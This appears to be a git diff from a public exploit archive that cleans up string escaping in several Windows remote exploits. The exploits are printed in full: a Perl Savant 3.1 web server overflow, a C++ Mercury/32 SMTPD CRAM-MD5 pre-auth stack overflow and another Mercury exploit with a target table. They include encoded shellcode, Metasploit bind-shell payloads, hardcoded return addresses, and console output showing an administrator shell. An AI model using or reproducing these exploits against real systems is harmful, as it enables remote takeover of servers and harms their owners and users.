-               unescape(\"%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32\") & _
-               unescape(\"%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d\") & _
-               unescape(\"%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d\") & _
-               unescape(\"%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46\") & _
-               unescape(\"%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45\") & _
-               unescape(\"%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46\") & _
-               unescape(\"%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c\") & _
-               unescape(\"%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c\") & _
-               unescape(\"%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32\") & _
-               unescape(\"%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46\") & _
-               unescape(\"%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f\") & _
-               unescape(\"%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56\") & _
-               unescape(\"%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46\") & _
-               unescape(\"%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36\") & _
-               unescape(\"%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f\") & _
-               unescape(\"%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d\") & _
-               unescape(\"%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d\") & _
-               unescape(\"%4f%4f%42%4d%5a\")
+shellcode =    unescape("%eb%03%59%eb%05%e8%f8%ff%ff%ff%4f%49%49%49%49%49") & _
+               unescape("%49%51%5a%56%54%58%36%33%30%56%58%34%41%30%42%36") & _
+               unescape("%48%48%30%42%33%30%42%43%56%58%32%42%44%42%48%34") & _
+               unescape("%41%32%41%44%30%41%44%54%42%44%51%42%30%41%44%41") & _
+               unescape("%56%58%34%5a%38%42%44%4a%4f%4d%4e%4f%4c%56%4b%4e") & _
+               unescape("%4d%54%4a%4e%49%4f%4f%4f%4f%4f%4f%4f%42%56%4b%48") & _
+               unescape("%4e%56%46%32%46%32%4b%38%45%44%4e%53%4b%58%4e%37") & _
+               unescape("%45%30%4a%57%41%30%4f%4e%4b%48%4f%34%4a%51%4b%58") & _
+               unescape("%4f%35%42%52%41%50%4b%4e%49%54%4b%48%46%53%4b%48") & _
+               unescape("%41%50%50%4e%41%33%42%4c%49%59%4e%4a%46%38%42%4c") & _
+               unescape("%46%37%47%50%41%4c%4c%4c%4d%30%41%30%44%4c%4b%4e") & _
+               unescape("%46%4f%4b%53%46%55%46%42%4a%52%45%57%45%4e%4b%58") & _
+               unescape("%4f%35%46%32%41%30%4b%4e%48%56%4b%58%4e%30%4b%44") & _
+               unescape("%4b%58%4f%55%4e%51%41%50%4b%4e%43%50%4e%32%4b%48") & _
+               unescape("%49%38%4e%56%46%42%4e%31%41%46%43%4c%41%53%4b%4d") & _
+               unescape("%46%36%4b%58%43%54%42%43%4b%48%42%44%4e%50%4b%58") & _
+               unescape("%42%47%4e%51%4d%4a%4b%38%42%54%4a%30%50%35%4a%56") & _
+               unescape("%50%48%50%54%50%30%4e%4e%42%55%4f%4f%48%4d%48%46") & _
+               unescape("%43%35%48%56%4a%36%43%33%44%53%4a%46%47%47%43%37") & _
+               unescape("%44%43%4f%45%46%55%4f%4f%42%4d%4a%46%4b%4c%4d%4e") & _
+               unescape("%4e%4f%4b%43%42%55%4f%4f%48%4d%4f%35%49%48%45%4e") & _
+               unescape("%48%56%41%38%4d%4e%4a%30%44%50%45%45%4c%36%44%50") & _
+               unescape("%4f%4f%42%4d%4a%46%49%4d%49%50%45%4f%4d%4a%47%55") & _
+               unescape("%4f%4f%48%4d%43%55%43%35%43%35%43%55%43%45%43%54") & _
+               unescape("%43%55%43%54%43%45%4f%4f%42%4d%48%56%4a%56%41%41") & _
+               unescape("%4e%45%48%46%43%55%49%48%41%4e%45%39%4a%36%46%4a") & _
+               unescape("%4c%31%42%37%47%4c%47%55%4f%4f%48%4d%4c%46%42%41") & _
+               unescape("%41%55%45%35%4f%4f%42%4d%4a%46%46%4a%4d%4a%50%32") & _
+               unescape("%49%4e%47%35%4f%4f%48%4d%43%55%45%55%4f%4f%42%4d") & _
+               unescape("%4a%36%45%4e%49%34%48%48%49%54%47%45%4f%4f%48%4d") & _
+               unescape("%42%35%46%35%46%55%45%45%4f%4f%42%4d%43%39%4a%46") & _
+               unescape("%47%4e%49%37%48%4c%49%57%47%35%4f%4f%48%4d%45%45") & _
+               unescape("%4f%4f%42%4d%48%56%4c%36%46%56%48%56%4a%46%43%46") & _
+               unescape("%4d%56%49%38%45%4e%4c%56%42%45%49%35%49%42%4e%4c") & _
+               unescape("%49%38%47%4e%4c%46%46%54%49%38%44%4e%41%33%42%4c") & _
+               unescape("%43%4f%4c%4a%50%4f%44%54%4d%32%50%4f%44%44%4e%32") & _
+               unescape("%43%49%4d%58%4c%57%4a%53%4b%4a%4b%4a%4b%4a%4a%46") & _
+               unescape("%44%57%50%4f%43%4b%48%41%4f%4f%45%57%46%44%4f%4f") & _
+               unescape("%48%4d%4b%55%47%55%44%55%41%45%41%45%41%45%4c%56") & _
+               unescape("%41%30%41%45%41%35%45%45%41%45%4f%4f%42%4d%4a%46") & _
+               unescape("%4d%4a%49%4d%45%30%50%4c%43%45%4f%4f%48%4d%4c%36") & _
+               unescape("%4f%4f%4f%4f%47%43%4f%4f%42%4d%4b%38%47%35%4e%4f") & _
+               unescape("%43%38%46%4c%46%46%4f%4f%48%4d%44%55%4f%4f%42%4d") & _
+               unescape("%4a%46%42%4f%4c%58%46%30%4f%45%43%35%4f%4f%48%4d") & _
+               unescape("%4f%4f%42%4d%5a")
 
   eat_this       = malicious_buffer + eip + noping + shellcode
 
diff --git a/platforms/windows/remote/4280.pl b/platforms/windows/remote/4280.pl
index 927686274..fed2b2c08 100755
--- a/platforms/windows/remote/4280.pl
+++ b/platforms/windows/remote/4280.pl
@@ -9,7 +9,7 @@ use IO::Socket;
 
 if(!($ARGV[1]))
 {
- print \"Uso: savant-3.1.pl <victim> <port>\\n\\n\";
+ print "Uso: savant-3.1.pl <victim> <port>\n\n";
  exit;
 }
 
@@ -17,68 +17,68 @@ if(!($ARGV[1]))
 
 
 
-$victim = IO::Socket::INET->new(Proto=>\'tcp\',
+$victim = IO::Socket::INET->new(Proto=>'tcp',
                                 PeerAddr=>$ARGV[0],
                                 PeerPort=>$ARGV[1])
-                        or die \"can\'t connect on $ARGV[0] sulla porta $ARGV[1]\";
+                        or die "can't connect on $ARGV[0] sulla porta $ARGV[1]";
 
 #Metasploit shellcode
 
 $shellcode = 
-\"\\x31\\xc9\\x83\\xe9\\xb0\\xd9\\xee\\xd9\\x74\\x24\\xf4\\x5b\\x81\\x73\\x13\\xb5\".
-\"\\x55\\x45\\xd4\\x83\\xeb\\xfc\\xe2\\xf4\\x49\\x3f\\xae\\x99\\x5d\\xac\\xba\\x2b\".
-\"\\x4a\\x35\\xce\\xb8\\x91\\x71\\xce\\x91\\x89\\xde\\x39\\xd1\\xcd\\x54\\xaa\\x5f\".
-\"\\xfa\\x4d\\xce\\x8b\\x95\\x54\\xae\\x9d\\x3e\\x61\\xce\\xd5\\x5b\\x64\\x85\\x4d\".
-\"\\x19\\xd1\\x85\\xa0\\xb2\\x94\\x8f\\xd9\\xb4\\x97\\xae\\x20\\x8e\\x01\\x61\\xfc\".
-\"\\xc0\\xb0\\xce\\x8b\\x91\\x54\\xae\\xb2\\x3e\\x59\\x0e\\x5f\\xea\\x49\\x44\\x3f\".
-\"\\xb6\\x79\\xce\\x5d\\xd9\\x71\\x59\\xb5\\x76\\x64\\x9e\\xb0\\x3e\\x16\\x75\\x5f\".
-\"\\xf5\\x59\\xce\\xa4\\xa9\\xf8\\xce\\x94\\xbd\\x0b\\x2d\\x5a\\xfb\\x5b\\xa9\\x84\".
-\"\\x4a\\x83\\x23\\x87\\xd3\\x3d\\x76\\xe6\\xdd\\x22\\x36\\xe6\\xea\\x01\\xba\\x04\".
-\"\\xdd\\x9e\\xa8\\x28\\x8e\\x05\\xba\\x02\\xea\\xdc\\xa0\\xb2\\x34\\xb8\\x4d\\xd6\".
-\"\\xe0\\x3f\\x47\\x2b\\x65\\x3d\\x9c\\xdd\\x40\\xf8\\x12\\x2b\\x63\\x06\\x16\\x87\".
-\"\\xe6\\x06\\x06\\x87\\xf6\\x06\\xba\\x04\\xd3\\x3d\\x54\\x88\\xd3\\x06\\xcc\\x35\".
-\"\\x20\\x3d\\xe1\\xce\\xc5\\x92\\x12\\x2b\\x63\\x3f\\x55\\x85\\xe0\\xaa\\x95\\xbc\".
-\"\\x11\\xf8\\x6b\\x3d\\xe2\\xaa\\x93\\x87\\xe0\\xaa\\x95\\xbc\\x50\\x1c\\xc3\\x9d\".
-\"\\xe2\\xaa\\x93\\x84\\xe1\\x01\\x10\\x2b\\x65\\xc6\\x2d\\x33\\xcc\\x93\\x3c\\x83\".
-\"\\x4a\\x83\\x10\\x2b\\x65\\x33\\x2f\\xb0\\xd3\\x3d\\x26\\xb9\\x3c\\xb0\\x2f\\x84\".
-\"\\xec\\x7c\\x89\\x5d\\x52\\x3f\\x01\\x5d\\x57\\x64\\x85\\x27\\x1f\\xab\\x07\\xf9\".
-\"\\x4b\\x17\\x69\\x47\\x38\\x2f\\x7d\\x7f\\x1e\\xfe\\x2d\\xa6\\x4b\\xe6\\x53\\x2b\".
-\"\\xc0\\x11\\xba\\x02\\xee\\x02\\x17\\x85\\xe4\\x04\\x2f\\xd5\\xe4\\x04\\x10\\x85\".
-\"\\x4a\\x85\\x2d\\x79\\x6c\\x50\\x8b\\x87\\x4a\\x83\\x2f\\x2b\\x4a\\x62\\xba\\x04\".
-\"\\x3e\\x02\\xb9\\x57\\x71\\x31\\xba\\x02\\xe7\\xaa\\x95\\xbc\\x45\\xdf\\x41\\x8b\".
-\"\\xe6\\xaa\\x93\\x2b\\x65\\x55\\x45\\xd4\";
+"\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xb5".
+"\x55\x45\xd4\x83\xeb\xfc\xe2\xf4\x49\x3f\xae\x99\x5d\xac\xba\x2b".
+"\x4a\x35\xce\xb8\x91\x71\xce\x91\x89\xde\x39\xd1\xcd\x54\xaa\x5f".
+"\xfa\x4d\xce\x8b\x95\x54\xae\x9d\x3e\x61\xce\xd5\x5b\x64\x85\x4d".
+"\x19\xd1\x85\xa0\xb2\x94\x8f\xd9\xb4\x97\xae\x20\x8e\x01\x61\xfc".
+"\xc0\xb0\xce\x8b\x91\x54\xae\xb2\x3e\x59\x0e\x5f\xea\x49\x44\x3f".
+"\xb6\x79\xce\x5d\xd9\x71\x59\xb5\x76\x64\x9e\xb0\x3e\x16\x75\x5f".
+"\xf5\x59\xce\xa4\xa9\xf8\xce\x94\xbd\x0b\x2d\x5a\xfb\x5b\xa9\x84".
+"\x4a\x83\x23\x87\xd3\x3d\x76\xe6\xdd\x22\x36\xe6\xea\x01\xba\x04".
+"\xdd\x9e\xa8\x28\x8e\x05\xba\x02\xea\xdc\xa0\xb2\x34\xb8\x4d\xd6".
+"\xe0\x3f\x47\x2b\x65\x3d\x9c\xdd\x40\xf8\x12\x2b\x63\x06\x16\x87".
+"\xe6\x06\x06\x87\xf6\x06\xba\x04\xd3\x3d\x54\x88\xd3\x06\xcc\x35".
+"\x20\x3d\xe1\xce\xc5\x92\x12\x2b\x63\x3f\x55\x85\xe0\xaa\x95\xbc".
+"\x11\xf8\x6b\x3d\xe2\xaa\x93\x87\xe0\xaa\x95\xbc\x50\x1c\xc3\x9d".
+"\xe2\xaa\x93\x84\xe1\x01\x10\x2b\x65\xc6\x2d\x33\xcc\x93\x3c\x83".
+"\x4a\x83\x10\x2b\x65\x33\x2f\xb0\xd3\x3d\x26\xb9\x3c\xb0\x2f\x84".
+"\xec\x7c\x89\x5d\x52\x3f\x01\x5d\x57\x64\x85\x27\x1f\xab\x07\xf9".
+"\x4b\x17\x69\x47\x38\x2f\x7d\x7f\x1e\xfe\x2d\xa6\x4b\xe6\x53\x2b".
+"\xc0\x11\xba\x02\xee\x02\x17\x85\xe4\x04\x2f\xd5\xe4\x04\x10\x85".
+"\x4a\x85\x2d\x79\x6c\x50\x8b\x87\x4a\x83\x2f\x2b\x4a\x62\xba\x04".
+"\x3e\x02\xb9\x57\x71\x31\xba\x02\xe7\xaa\x95\xbc\x45\xdf\x41\x8b".
+"\xe6\xaa\x93\x2b\x65\x55\x45\xd4";
 
 
 
 
 
-$nop=\"\\x90\"x201;
-$incbh=\"\\xfe\\xc7\"x4;			# inc bh opcode
-$incebx=\"\\x43\"x23;			# inc ebx opcode
-$asm1 = \"\\x53\\xc3\";			# push ebx,ret opcode
-$nop1=\"\\x90\"x19;
-$asm = \"\\x83\\xc4\\x8c\\x54\\xc3\";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode 
-$nop2=\"\\x90\"x210;
+$nop="\x90"x201;
+$incbh="\xfe\xc7"x4;			# inc bh opcode
+$incebx="\x43"x23;			# inc ebx opcode
+$asm1 = "\x53\xc3";			# push ebx,ret opcode
+$nop1="\x90"x19;
+$asm = "\x83\xc4\x8c\x54\xc3";		# add esp,-74,pueh esp,ret for jump in $nop without a direct jmp because there are 						# some opcode not allowed and we have need of space for our shellcode 
+$nop2="\x90"x210;
 
 
-$eip = \"\\x74\\x86\\x41\";			# 0x00418674 memory address of pop eax, ret in Savant.exe it\'s universal
+$eip = "\x74\x86\x41";			# 0x00418674 memory address of pop eax, ret in Savant.exe it's universal
 
-$exploit = $asm.  \" /\". $nop.$incbh.$incebx .$asm1.$nop1. $eip .\"\\r\\n\\r\\n\" .$nop2.$shellcode;
+$exploit = $asm.  " /". $nop.$incbh.$incebx .$asm1.$nop1. $eip ."\r\n\r\n" .$nop2.$shellcode;
 
 print $victim $exploit;
 
-print \" + Malicious GET request sent ...\\n\";
+print " + Malicious GET request sent ...\n";
 
 
-print \"Done.\\n\";
+print "Done.\n";
 
 
 close($victim);
 
 $host = $ARGV[0];
-print \" + connect to 4444 of $host ...\\n\";
+print " + connect to 4444 of $host ...\n";
 sleep(3);
-system(\"telnet $host 4444\");
+system("telnet $host 4444");
 
 exit;
 
diff --git a/platforms/windows/remote/4301.cpp b/platforms/windows/remote/4301.cpp
index f26b54504..290c26aff 100755
--- a/platforms/windows/remote/4301.cpp
+++ b/platforms/windows/remote/4301.cpp
@@ -13,7 +13,7 @@
 
   It will bind a cmdshell on port 1154 if successful.
 
-Z:\\Exp\\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
+Z:\Exp\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
 == Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow
 == Public Version 1.0
 == http://www.ph4nt0m.org   2007-08-22
@@ -30,13 +30,13 @@ Z:\\Exp\\Mercury SMTPD>mercury_smtpd.exe 127.0.0.1 25
 [C] Send Payload...
 [-] Done! cmdshell@1154?
 
-Z:\\Exp\\Mercury SMTPD\\Mercury SMTPD>nc -vv 127.0.0.1 1154
+Z:\Exp\Mercury SMTPD\Mercury SMTPD>nc -vv 127.0.0.1 1154
 DNS fwd/rev mismatch: localhost != gnu
 localhost [127.0.0.1] 1154 (?) open
 Microsoft Windows XP [°æ±¾ 5.1.2600]
 (C) °æȨËùÓÐ 1985-2001 Microsoft Corp.
 
-e:\\MERCURY>whoami
+e:\MERCURY>whoami
 whoami
 Administrator
   
@@ -46,42 +46,42 @@ Administrator
 #include <io.h>
 #include <stdio.h>
 #include <winsock2.h>
-#pragma comment(lib, \"ws2_32\")
+#pragma comment(lib, "ws2_32")
 
 
 /* win32_bind -  EXITFUNC=thread LPORT=1154 Size=317 Encoder=None http://metasploit.com */
 unsigned char shellcode[] =
-\"\\xfc\\x6a\\xeb\\x4d\\xe8\\xf9\\xff\\xff\\xff\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\"
-\"\\x3c\\x8b\\x7c\\x05\\x78\\x01\\xef\\x8b\\x4f\\x18\\x8b\\x5f\\x20\\x01\\xeb\\x49\"
-\"\\x8b\\x34\\x8b\\x01\\xee\\x31\\xc0\\x99\\xac\\x84\\xc0\\x74\\x07\\xc1\\xca\\x0d\"
-\"\\x01\\xc2\\xeb\\xf4\\x3b\\x54\\x24\\x28\\x75\\xe5\\x8b\\x5f\\x24\\x01\\xeb\\x66\"
-\"\\x8b\\x0c\\x4b\\x8b\\x5f\\x1c\\x01\\xeb\\x03\\x2c\\x8b\\x89\\x6c\\x24\\x1c\\x61\"
-\"\\xc3\\x31\\xdb\\x64\\x8b\\x43\\x30\\x8b\\x40\\x0c\\x8b\\x70\\x1c\\xad\\x8b\\x40\"
-\"\\x08\\x5e\\x68\\x8e\\x4e\\x0e\\xec\\x50\\xff\\xd6\\x66\\x53\\x66\\x68\\x33\\x32\"
-\"\\x68\\x77\\x73\\x32\\x5f\\x54\\xff\\xd0\\x68\\xcb\\xed\\xfc\\x3b\\x50\\xff\\xd6\"
-\"\\x5f\\x89\\xe5\\x66\\x81\\xed\\x08\\x02\\x55\\x6a\\x02\\xff\\xd0\\x68\\xd9\\x09\"
-\"\\xf5\\xad\\x57\\xff\\xd6\\x53\\x53\\x53\\x53\\x53\\x43\\x53\\x43\\x53\\xff\\xd0\"
-\"\\x66\\x68\\x04\\x82\\x66\\x53\\x89\\xe1\\x95\\x68\\xa4\\x1a\\x70\\xc7\\x57\\xff\"
-\"\\xd6\\x6a\\x10\\x51\\x55\\xff\\xd0\\x68\\xa4\\xad\\x2e\\xe9\\x57\\xff\\xd6\\x53\"
-\"\\x55\\xff\\xd0\\x68\\xe5\\x49\\x86\\x49\\x57\\xff\\xd6\\x50\\x54\\x54\\x55\\xff\"
-\"\\xd0\\x93\\x68\\xe7\\x79\\xc6\\x79\\x57\\xff\\xd6\\x55\\xff\\xd0\\x66\\x6a\\x64\"
-\"\\x66\\x68\\x63\\x6d\\x89\\xe5\\x6a\\x50\\x59\\x29\\xcc\\x89\\xe7\\x6a\\x44\\x89\"
-\"\\xe2\\x31\\xc0\\xf3\\xaa\\xfe\\x42\\x2d\\xfe\\x42\\x2c\\x93\\x8d\\x7a\\x38\\xab\"
-\"\\xab\\xab\\x68\\x72\\xfe\\xb3\\x16\\xff\\x75\\x44\\xff\\xd6\\x5b\\x57\\x52\\x51\"
-\"\\x51\\x51\\x6a\\x01\\x51\\x51\\x55\\x51\\xff\\xd0\\x68\\xad\\xd9\\x05\\xce\\x53\"
-\"\\xff\\xd6\\x6a\\xff\\xff\\x37\\xff\\xd0\\x8b\\x57\\xfc\\x83\\xc4\\x64\\xff\\xd6\"
-\"\\x52\\xff\\xd0\\x68\\xef\\xce\\xe0\\x60\\x53\\xff\\xd6\\xff\\xd0\";
+"\xfc\x6a\xeb\x4d\xe8\xf9\xff\xff\xff\x60\x8b\x6c\x24\x24\x8b\x45"
+"\x3c\x8b\x7c\x05\x78\x01\xef\x8b\x4f\x18\x8b\x5f\x20\x01\xeb\x49"
+"\x8b\x34\x8b\x01\xee\x31\xc0\x99\xac\x84\xc0\x74\x07\xc1\xca\x0d"
+"\x01\xc2\xeb\xf4\x3b\x54\x24\x28\x75\xe5\x8b\x5f\x24\x01\xeb\x66"
+"\x8b\x0c\x4b\x8b\x5f\x1c\x01\xeb\x03\x2c\x8b\x89\x6c\x24\x1c\x61"
+"\xc3\x31\xdb\x64\x8b\x43\x30\x8b\x40\x0c\x8b\x70\x1c\xad\x8b\x40"
+"\x08\x5e\x68\x8e\x4e\x0e\xec\x50\xff\xd6\x66\x53\x66\x68\x33\x32"
+"\x68\x77\x73\x32\x5f\x54\xff\xd0\x68\xcb\xed\xfc\x3b\x50\xff\xd6"
+"\x5f\x89\xe5\x66\x81\xed\x08\x02\x55\x6a\x02\xff\xd0\x68\xd9\x09"
+"\xf5\xad\x57\xff\xd6\x53\x53\x53\x53\x53\x43\x53\x43\x53\xff\xd0"
+"\x66\x68\x04\x82\x66\x53\x89\xe1\x95\x68\xa4\x1a\x70\xc7\x57\xff"
+"\xd6\x6a\x10\x51\x55\xff\xd0\x68\xa4\xad\x2e\xe9\x57\xff\xd6\x53"
+"\x55\xff\xd0\x68\xe5\x49\x86\x49\x57\xff\xd6\x50\x54\x54\x55\xff"
+"\xd0\x93\x68\xe7\x79\xc6\x79\x57\xff\xd6\x55\xff\xd0\x66\x6a\x64"
+"\x66\x68\x63\x6d\x89\xe5\x6a\x50\x59\x29\xcc\x89\xe7\x6a\x44\x89"
+"\xe2\x31\xc0\xf3\xaa\xfe\x42\x2d\xfe\x42\x2c\x93\x8d\x7a\x38\xab"
+"\xab\xab\x68\x72\xfe\xb3\x16\xff\x75\x44\xff\xd6\x5b\x57\x52\x51"
+"\x51\x51\x6a\x01\x51\x51\x55\x51\xff\xd0\x68\xad\xd9\x05\xce\x53"
+"\xff\xd6\x6a\xff\xff\x37\xff\xd0\x8b\x57\xfc\x83\xc4\x64\xff\xd6"
+"\x52\xff\xd0\x68\xef\xce\xe0\x60\x53\xff\xd6\xff\xd0";
 
 
 
 // Base64×Ö·û¼¯
 __inline char GetB64Char(int index)
 {
-    const char szBase64Table[] = \"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/\";
+    const char szBase64Table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
     if (index >= 0 && index < 64)
 	return szBase64Table[index];
     
-    return \'=\';
+    return '=';
 }
 
 
@@ -128,13 +128,13 @@ inline int Base64Encode(char * base64code, const char * src, int src_len)
 	
 	p64[0] = GetB64Char((B0(ulTmp) >> 2) & 0x3F); 
 	p64[1] = GetB64Char((B0(ulTmp) << 6 >> 2 | B1(ulTmp) >> 4) & 0x3F); 
-	p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : \'=\'; 
-	p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : \'=\'; 
+	p64[2] = rest > 1 ? GetB64Char((B1(ulTmp) << 4 >> 2 | B2(ulTmp) >> 6) & 0x3F) : '='; 
+	p64[3] = rest > 2 ? GetB64Char((B2(ulTmp) << 2 >> 2) & 0x3F) : '='; 
 	p64 += 4; 
 	len += 4;
     }
     
-    *p64 = \'\\0\'; 
+    *p64 = '\0'; 
     
     return len;
 }
@@ -159,7 +159,7 @@ char* GetErrorMessage(DWORD dwMessageId)
 		return ErrorMessage;
     else
     {
-		sprintf(ErrorMessage, \"ID:%d(%08.8X)\", dwMessageId, dwMessageId);
+		sprintf(ErrorMessage, "ID:%d(%08.8X)", dwMessageId, dwMessageId);
 		return ErrorMessage;
     }
 
@@ -227,11 +227,11 @@ int check_recv(SOCKET s, char* str_sig)
 		ret = recv(s, buf, sizeof(buf), 0);
 		if(ret > 0)
 		{
-			printf(\"[S] %s\", buf);
+			printf("[S] %s", buf);
 		}
 		else
 		{
-			printf(\"[-] recv() %s\\n\",  GetErrorMessage(GetLastError()));
+			printf("[-] recv() %s\n",  GetErrorMessage(GetLastError()));
 			closesocket(s);
 			ExitProcess(-1);
 		}
@@ -261,7 +261,7 @@ int check_send(SOCKET s, char* buf, unsigned int buf_len)
 	}
 	else
 	{
-		printf(\"[-] send() %s\\n\", GetErrorMessage(GetLastError()));
+		printf("[-] send() %s\n", GetErrorMessage(GetLastError()));
 		closesocket(s);
 		ExitProcess(-1);
 	}
@@ -279,41 +279,41 @@ void exploit_mercury_smtpd(char* ip, unsigned short port)
 
 	memset(buf, 0x90, sizeof(buf));
 	memcpy(&buf[1244-sizeof(shellcode)-32], shellcode, sizeof(shellcode));
-	memcpy(&buf[1244], \"\\x90\\x90\\xeb\\x06\", 4);
-	memcpy(&buf[1244+4], \"\\x2d\\x12\\x40\\x00\", 4);  //universal opcode in mercury.exe. no safeseh
-	memcpy(&buf[1244+4+4], \"\\x90\\x90\\x90\\x90\\xE9\\x44\\xfd\\xff\\xff\", 9);
-	buf[sizeof(buf)-1] = \'\\0\'; 
+	memcpy(&buf[1244], "\x90\x90\xeb\x06", 4);
+	memcpy(&buf[1244+4], "\x2d\x12\x40\x00", 4);  //universal opcode in mercury.exe. no safeseh
+	memcpy(&buf[1244+4+4], "\x90\x90\x90\x90\xE9\x44\xfd\xff\xff", 9);
+	buf[sizeof(buf)-1] = '\0'; 
 
 	memset(payload, 0x00, sizeof(payload));
 	base64_len = Base64Encode(payload, buf, sizeof(buf));
-	memcpy(&payload[base64_len], \"\\r\\n\", 3);
+	memcpy(&payload[base64_len], "\r\n", 3);
 
-	printf(\"[*] connect to %s:%d ... \", ip, port);
+	printf("[*] connect to %s:%d ... ", ip, port);
 	WSAStartup(MAKEWORD(2,2), &wsa);
 	s = MakeConnection(ip, port, 10);
 	if(s <= 0)
 	{
-		printf(\"Failed! %s\\n\",  GetErrorMessage(GetLastError()) );
+		printf("Failed! %s\n",  GetErrorMessage(GetLastError()) );
 		return;
 	}
 	else
 	{
-		printf(\"OK!\\n\");
+		printf("OK!\n");
 	}
 
-	_snprintf(buf, sizeof(buf), \"EHLO void#ph4nt0m.org\\r\\n\");
-	printf(\"[C] %s\", buf);
+	_snprintf(buf, sizeof(buf), "EHLO void#ph4nt0m.org\r\n");
+	printf("[C] %s", buf);
 	check_send(s, buf, strlen(buf));
-	check_recv(s, \"250 HELP\");
+	check_recv(s, "250 HELP");
 		
-	_snprintf(buf, sizeof(buf), \"AUTH CRAM-MD5\\r\\n\");
-	printf(\"[C] %s\", buf);
+	_snprintf(buf, sizeof(buf), "AUTH CRAM-MD5\r\n");
+	printf("[C] %s", buf);
 	check_send(s, buf, strlen(buf));
-	check_recv(s, \"334\");
+	check_recv(s, "334");
 
-	printf(\"[C] Send Payload...\\n\");
+	printf("[C] Send Payload...\n");
 	check_send(s, payload, strlen(payload));
-	printf(\"[-] Done! cmdshell@1154?\\n\");
+	printf("[-] Done! cmdshell@1154?\n");
 	
 	closesocket(s);
 	WSACleanup();
@@ -322,18 +322,18 @@ void exploit_mercury_smtpd(char* ip, unsigned short port)
 
 void main(int argc, char* argv[])
 {
-	printf(\"== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\\n\");
-	printf(\"== Public Version 1.0\\n\");
-	printf(\"== http://www.ph4nt0m.org   2007-08-22\\n\");
-	printf(\"== code by Zhenhan.Liu\\n\\n\");
+	printf("== Mercury/32 4.51 SMTPD CRAM-MD5 Pre-Auth Remote Stack Overflow\n");
+	printf("== Public Version 1.0\n");
+	printf("== http://www.ph4nt0m.org   2007-08-22\n");
+	printf("== code by Zhenhan.Liu\n\n");
 	
 	
 	if(argc==3)
 		exploit_mercury_smtpd(argv[1], atoi(argv[2]));
 	else
 	{
-		printf(	\"Usage:\\n\"
-				\"  %s <ip> <port> \\n\", argv[0]);
+		printf(	"Usage:\n"
+				"  %s <ip> <port> \n", argv[0]);
 	}
 }
 
diff --git a/platforms/windows/remote/4316.cpp b/platforms/windows/remote/4316.cpp
index 91ae3249f..6a8163517 100755
--- a/platforms/windows/remote/4316.cpp
+++ b/platforms/windows/remote/4316.cpp
@@ -28,7 +28,7 @@
 #include <stdlib.h>
 #include <string.h>
 #include <winsock2.h>
-#pragma comment(lib,\"ws2_32\")
+#pragma comment(lib,"ws2_32")
 #include <ctype.h>
 
 
@@ -60,12 +60,12 @@ struct {
 	unsigned long ret ;
 } targets[]= 
 		{	
-			{\"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll  ]\",        0x258d0d1e },// jmp esp						
-			{\"Windows XP SP0 RUSSIAN           [shell32.dll]\",        0x77b49bbb },// jmp esp
-			{\"Windows XP SP1 RUSSIAN           [user32.dll ]\",        0x77db532f },// jmp esp
-			{\"Windows XP SP2 RUSSIAN           [shell32.dll]\",        0x7d168fe7 },// jmp esp
-			{\"Windows 2003 SP0 STANDART        [shell32.dll]\",        0x77b0f967 },// jmp esp
-			{\"Debug\",                                                 0x42424242 },// 
+			{"UNIVERSAL: Mercury/32 SMTP v4.51 [TER32.dll  ]",        0x258d0d1e },// jmp esp						
+			{"Windows XP SP0 RUSSIAN           [shell32.dll]",        0x77b49bbb },// jmp esp
+			{"Windows XP SP1 RUSSIAN           [user32.dll ]",        0x77db532f },// jmp esp
+			{"Windows XP SP2 RUSSIAN           [shell32.dll]",        0x7d168fe7 },// jmp esp
+			{"Windows 2003 SP0 STANDART        [shell32.dll]",        0x77b0f967 },// jmp esp
+			{"Debug",                                                 0x42424242 },// 
 			{NULL,                                                    0x00000000 }
 		};
 
@@ -76,30 +76,30 @@ struct {
 	int length;
 	char * shellcode;
 }shellcodes[]={ 	
-	 {\"Bindshell, port 4444   [ args: none ]\", 344, 
+	 {"Bindshell, port 4444   [ args: none ]", 344, 
 		 /* win32_bind -  EXITFUNC=seh LPORT=4444 Size=344 Encoder=Pex http://metasploit.com */
-		\"\\x2b\\xc9\\x83\\xe9\\xb0\\xe8\\xff\\xff\\xff\\xff\\xc0\\x5e\\x81\\x76\\x0e\\x02\"
-		\"\\x6b\\x82\\x87\\x83\\xee\\xfc\\xe2\\xf4\\xfe\\x01\\x69\\xca\\xea\\x92\\x7d\\x78\"
